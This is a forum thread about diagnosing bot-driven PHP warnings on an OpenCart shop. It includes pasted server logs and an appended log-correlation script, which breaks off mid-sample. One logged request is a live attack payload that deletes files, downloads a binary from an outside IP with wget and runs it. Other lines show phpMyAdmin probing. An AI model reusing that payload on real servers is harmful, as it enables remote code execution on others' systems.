Post by SScott » Wed Aug 31, 2022 12:25 am

Hello and thank you in advance. Can someone please give me direction in what to look for on these errors? I get them daily and by the dozens.

2022-08-30 1:53:28 - PHP Warning: Undefined array key "password" in /home/****/public_html/catalog/controller/account/login.php on line 174
2022-08-30 1:53:28 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 177
2022-08-30 1:53:33 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 160
2022-08-30 1:53:33 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 167
2022-08-30 1:53:36 - PHP Warning: Undefined array key "name" in /home/****/public_html/catalog/controller/information/contact.php on line 145
2022-08-30 1:53:36 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/information/contact.php on line 149
2022-08-30 1:53:36 - PHP Warning: Undefined array key "enquiry" in /home/****/public_html/catalog/controller/information/contact.php on line 153
2022-08-30 13:20:23 - PHP Warning: file_get_contents(https://www.google.com/recaptcha/api/siteverify?secret=****&response=&remoteip=91.211.89.207): Failed to open stream: Connection timed out in /home/****/public_html/catalog/controller/extension/captcha/google.php on line 27
2022-08-30 13:20:23 - PHP Warning: Trying to access array offset on value of type null in /home/****/public_html/catalog/controller/extension/captcha/google.php on line 31

Post by SScott » Wed Aug 31, 2022 12:45 am

1. Version 3.0.3.8
2. None - Template/Theme
3. Several - (Additional) Installed Extension(s)
4. None - (Additional) Installed Translation(s)

Post by straightlight » Wed Aug 31, 2022 8:33 am

SScott wrote:
Wed Aug 31, 2022 12:45 am
1. Version 3.0.3.8
2. None - Template/Theme
3. Several - (Additional) Installed Extension(s)
4. None - (Additional) Installed Translation(s)

Dedication and passion goes to those who are able to push and merge a project.

Regards,
Straightlight
Programmer / Opencart Tester


Post by paulfeakins » Wed Aug 31, 2022 6:22 pm

Probably various extensions.

One seems to be that your server might not be allowing you to make a request to Google's CAPTCHA.

UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk


Post by ADD Creative » Wed Aug 31, 2022 6:38 pm

Could be a bot doing a POST to account/login without the email and password fields. Look in your web access logs for the same times.

www.add-creative.co.uk


Post by SScott » Thu Sep 01, 2022 10:22 pm

paulfeakins wrote:
Wed Aug 31, 2022 6:22 pm
Probably various extensions.

One seems to be that your server might not be allowing you to make a request to Google's CAPTCHA.

How would I narrow it down to an ext? It is a dedi server and allows re-captcha on html pages I have built. Thank you kindly.

ADD Creative wrote:
Wed Aug 31, 2022 6:38 pm
Could be a bot doing a POST to account/login without the email and password fields. Look in your web access logs for the same times.

I suspected this as well. I will see if I can find matching times. Thanks!

Post by SScott » Wed Sep 21, 2022 11:28 pm

ADD Creative wrote:
Wed Aug 31, 2022 6:38 pm
Could be a bot doing a POST to account/login without the email and password fields. Look in your web access logs for the same times.

Here is activity at the time of some of them. Any of this seem like the culprit?

104.248.8.32 - - [21/Sep/2022:09:33:08 -0500] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
40.94.29.194 - - [21/Sep/2022:09:34:25 -0500] "GET / HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36"
59.55.189.71 - - [21/Sep/2022:09:44:12 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 301 310 "-" "Hello, world"
136.243.220.210 - - [21/Sep/2022:09:46:03 -0500] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
103.147.64.43 - - [21/Sep/2022:09:48:47 -0500] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
80.94.92.239 - - [21/Sep/2022:09:51:29 -0500] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.131.66.209 - - [21/Sep/2022:09:54:22 -0500] "GET / HTTP/1.1" 301 231 "-" "curl/7.64.1"
107.173.40.211 - - [21/Sep/2022:09:54:25 -0500] "GET / HTTP/1.1" 301 239 "-" "python-requests/2.24.0"
182.254.225.35 - - [21/Sep/2022:09:56:57 -0500] "GET http://*.*.*.*:80/pma/scripts/setup.php HTTP/1.0" 301 256 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:57 -0500] "GET http://*.*.*.*:80/mysql/scripts/setup.php HTTP/1.0" 301 258 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:58 -0500] "GET http://*.*.*.*:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 301 263 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:58 -0500] "GET http://*.*.*.*:80/db/scripts/setup.php HTTP/1.0" 301 255 "-" "-"
107.167.35.138 - - [21/Sep/2022:09:57:46 -0500] "GET / HTTP/1.1" 301 239 "-" "-"

Post by ADD Creative » Thu Sep 22, 2022 12:21 am

You would need to look for "POST /index.php?route=account/login" or "POST /index.php?route=information/contact" in your logs. That may be the wrong log file as the responses are all 301 redirects, suggesting that is for http and not https.

www.add-creative.co.uk


Post by SScott » Thu Sep 22, 2022 2:53 am

ADD Creative wrote:
Thu Sep 22, 2022 12:21 am
You would need to look for "POST /index.php?route=account/login" or "POST /index.php?route=information/contact" in your logs. That may be the wrong log file as the responses are all 301 redirects, suggesting that is for http and not https.

Thank you!

You were right. I grabbed the most recent ones from the https version.

Here is the error in opencart:
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 160
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 167
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 174
2022-09-21 13:27:55 - PHP Warning: Undefined array key "password" in /home/*/public_html/catalog/controller/account/login.php on line 174
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 177
2022-09-21 13:27:56 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 160
2022-09-21 13:27:56 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 167
2022-09-21 13:27:58 - PHP Warning: Undefined array key "name" in /home/*/public_html/catalog/controller/information/contact.php on line 145
2022-09-21 13:27:58 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/information/contact.php on line 149
2022-09-21 13:27:58 - PHP Warning: Undefined array key "enquiry" in /home/*/public_html/catalog/controller/information/contact.php on line 153
Here are the logs for that time:
142.93.129.96 - - [21/Sep/2022:13:27:52 -0500] "GET / HTTP/1.1" 200 13568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:53 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:54 -0500] "GET /redacted HTTP/1.1" 200 13045 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9688 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/jquery/jquery-2.1.1.min.js HTTP/1.1" 200 29497 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/bootstrap/css/bootstrap.min.css HTTP/1.1" 200 19882 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/stylesheet.css HTTP/1.1" 200 3507 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 7053 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/wide-grid.css HTTP/1.1" 200 347 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/so_megamenu.css HTTP/1.1" 200 6863 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/vendor/isenselabs/isearch/isearch.css HTTP/1.1" 200 418 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/supermenu.css?v=30 HTTP/1.1" 200 3815 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/msf/style.css?v HTTP/1.1" 200 551 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/msf/style-2.css?v HTTP/1.1" 200 - "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/so_megamenu.js HTTP/1.1" 200 1877 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/bootstrap/js/bootstrap.min.js HTTP/1.1" 200 9745 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/vendor/isenselabs/isearch/isearch.js HTTP/1.1" 200 5339 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/supermenu-responsive.js?v=30 HTTP/1.1" 200 1356 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/jquery.hoverIntent.minified.js HTTP/1.1" 200 628 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/js_params.js?v HTTP/1.1" 200 208 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/bloodhound.min.js?v HTTP/1.1" 200 4476 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/typeahead.jquery.min.js?v HTTP/1.1" 200 8988 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/live_search.min.js?v HTTP/1.1" 200 1343 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/common.js HTTP/1.1" 200 3029 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/DFSLOGO.jpg HTTP/1.1" 200 26898 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /index.php?route=extension/module/supermenu/css HTTP/1.1" 200 99 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/LeftBanner.jpg HTTP/1.1" 200 47856 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted1050-228x228.png HTTP/1.1" 200 12505 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted1180-228x228.png HTTP/1.1" 200 7872 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted6470-228x228.png HTTP/1.1" 200 12716 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3410-228x228.png HTTP/1.1" 200 6535 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted345-228x228.png HTTP/1.1" 200 4200 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77160 "redacted/catalog/view/javascript/font-awesome/css/font-awesome.min.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/UL366-228x228.png HTTP/1.1" 200 4676 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3100-228x228.png HTTP/1.1" 200 14316 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3110-228x228.png HTTP/1.1" 200 9147 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3340-228x228.png HTTP/1.1" 200 6880 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "GET /index.php?route=information/contact HTTP/1.1" 200 9793 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted5150-228x228.png HTTP/1.1" 200 11959 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/cart.png HTTP/1.1" 404 83180 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9615 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9701 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9861 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9866 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
Here is what I think is the offender?:
142.93.129.96 - - [21/Sep/2022:13:27:52 -0500] "GET / HTTP/1.1" 200 13568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:53 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9615 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9701 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9861 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9866 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"

Post by ADD Creative » Thu Sep 22, 2022 3:45 am

Does look like a bot. Repeated posts to the same URL and using an out of date user agent. I would start with banning that IP address. If you start seeing it from other IP addresses you can do things like blocking by user agent or empty post data. Other than that, change the code in the controller to at least stop the error log filling up.

www.add-creative.co.uk
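
Added example (not part of the thread and not OpenCart code): the log check ADD Creative describes in the posts above, pairing each "Undefined array key" warning with the POST to account/login or information/contact that came just before it and counting the result per client IP. The sample lines, the addresses and the 2-second window are constructed, and both logs are assumed to be written in the same local time zone.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Routes whose controllers logged the warnings in the thread.
WATCHED_ROUTES = ("account/login", "information/contact")

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
WARNING_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{1,2}:\d{2}:\d{2}) - PHP Warning: Undefined array key '
    r'"(?P<key>[^"]+)" in \S*?/catalog/controller/(?P<route>[\w/]+)\.php on line \d+$'
)

def parse_posts(access_lines):
    """Return the POST requests to the watched routes from combined-format log lines."""
    posts = []
    for line in access_lines:
        m = ACCESS_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        route = parse_qs(urlsplit(m["target"]).query).get("route", [""])[0]
        if route in WATCHED_ROUTES:
            # Assumption: both logs use the same local time, so the UTC offset is dropped.
            when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
            posts.append({"when": when, "ip": m["ip"], "route": route,
                          "referer": m["referer"], "agent": m["agent"]})
    return posts

def parse_warnings(error_lines):
    """Return the 'Undefined array key' warnings with the controller route they came from."""
    warnings = []
    for line in error_lines:
        m = WARNING_RE.match(line.strip())
        if m:
            when = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            warnings.append({"when": when, "route": m["route"], "key": m["key"]})
    return warnings

def correlate(access_lines, error_lines, slack=timedelta(seconds=2)):
    """Per client IP: POST count, POSTs without Referer, and warnings attributed to it."""
    posts = parse_posts(access_lines)
    report = defaultdict(lambda: {"posts": 0, "no_referer": 0, "warnings": 0, "agents": set()})
    for p in posts:
        entry = report[p["ip"]]
        entry["posts"] += 1
        entry["no_referer"] += p["referer"] in ("", "-")
        entry["agents"].add(p["agent"])
    for w in parse_warnings(error_lines):
        # Attribute the warning to the latest POST on the same route within the window.
        near = [p for p in posts
                if p["route"] == w["route"] and timedelta(0) <= w["when"] - p["when"] <= slack]
        if near:
            report[max(near, key=lambda p: p["when"])["ip"]]["warnings"] += 1
    return dict(report)

def suspects(report, min_posts=3):
    """IPs that POSTed repeatedly and triggered at least one missing-field warning."""
    return sorted(ip for ip, e in report.items()
                  if e["posts"] >= min_posts and e["warnings"] > 0)

# Constructed sample data in the same formats as the logs quoted in the thread.
OLD_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/85.0.4183.121 Safari/537.36"
NEW_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/105.0.0.0 Safari/537.36"
ACCESS_SAMPLE = f'''
203.0.113.10 - - [21/Sep/2022:13:27:53 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "{OLD_UA}"
203.0.113.10 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "{OLD_UA}"
198.51.100.7 - - [21/Sep/2022:13:27:54 -0500] "GET /index.php?route=product/category HTTP/1.1" 200 13045 "https://shop.example/" "{NEW_UA}"
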